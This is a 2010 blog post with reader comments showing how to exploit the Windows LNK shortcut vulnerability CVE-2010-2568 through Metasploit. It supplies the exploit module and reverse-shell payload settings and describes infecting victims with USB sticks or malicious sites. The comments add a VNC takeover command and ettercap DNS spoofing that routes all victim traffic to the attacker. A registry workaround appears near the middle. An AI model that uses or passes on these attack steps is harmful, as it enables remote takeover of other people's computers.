Windows LNK vulnerability (CVE-2010-2568) in action

On July 20, 2010, in Hacks 'n Tricks, IT-Sec, Linux, by hardez

These days a new Windows 0day exploit is detected.
With it an attacker can own a victim without clicking on any file.
Put on a USB-Stick it infects the victim by connecting to the PC.

This video show how it works and beneath the video I will show you how to protect against these vulnerability!

All you have to do is to trick a victim to go to a malicious website or put the LNK file and the DLL on a USB Stick and wait till it connects it to a PC. Nothing more Windows will do the rest for you!

First update Metasploit to the newest revision and set your exploit

use windows/browser/ms10_xxx_windows_shell_lnk_execute
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT <any port>

Thats it!


Music by Silence – Réalité

or on Vimeo

Windows LNK vulnerability (CVE-2010-2568) in action from hardez on Vimeo.

Now I tell you how to protect yourself against this flaw:

  1. open regedit (goto Start -> run -> regedit)
  2. navigate to HKEY_CLASSES_ROOT/lnkfile/shellex/IconHandler
  3. click on File -> Export to save the actual state so you can Import it as soon as Microsoft path this flaw
  4. Delete the Value
  5. Reboot

Now wait for a patch and then just doubleclick on your exported file.


Tagged with:  

12 Responses to “Windows LNK vulnerability (CVE-2010-2568) in action”

  1. See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect says:
    July 20, 2010 at 11:19 am

    [...] way but you can also put the files on a USB Stick and own you victim this way. Have a look at Windows LNK vulnerability (CVE-2010-2568) in action Reply With Quote + Reply to Thread « Previous Thread | Next [...]

  2. osprey says:
    July 20, 2010 at 9:08 pm

    I can confirm that this method works on Windows XP. However I cannot get it to work with Windows 7.

  3. hardez says:
    July 20, 2010 at 9:38 pm

    Will try it tomorrow, but I’m pretty sure that I’ve read that all versions since 2000 are effected!

  4. andy says:
    July 21, 2010 at 8:23 am

    Hey great video, but how did you get the vnc server? I have been trying but can’t could you post the commands?

    thanks heaps

  5. hardez says:
    July 21, 2010 at 8:47 am

    you can get the VNC session by typing “run vnc” in a meterpreter session

  6. zitstif says:
    July 24, 2010 at 3:09 am

    You could force your clients (victims) to your metasploit listener via ettercap. In the etter.dns file you could force all domain requests to the attacker’s server.

    (like
    *.* A 172.0.23.101
    )

  7. hardez says:
    July 24, 2010 at 7:44 pm

    good idea I also tried to integrate it in evry site as an iframe but then the exploit didn’t work. Don’t know why.
    Metasploit sonds the exploit but didn’t finish it

  8. mekanical says:
    August 1, 2010 at 9:54 am

    This does not work on windows 7 unless you actually click the link.

  9. Rakesh says:
    August 2, 2010 at 8:03 am

    can u just tell me that how we could enable a remote pc and exploit through this vulnerability

  10. Rakesh says:
    August 2, 2010 at 8:07 am

    what this LHOST and LPORT will do

  11. Rakesh says:
    August 2, 2010 at 8:17 am

    just explain what WEBDAV means ,pls!

  12. hardez says:
    August 2, 2010 at 4:08 pm

    @rakesh
    >can u just tell me that
    >how we could enable a remote pc and exploit through this vulnerability
    Thats what you have to find out.

    >what this LHOST and LPORT will do
    LHOST == local host (your local IP)
    LPORT == local port (a free port for the reverse meterpreter session)

    >just explain what WEBDAV means ,pls!
    http://en.wikipedia.org/wiki/WebDav

Leave a Reply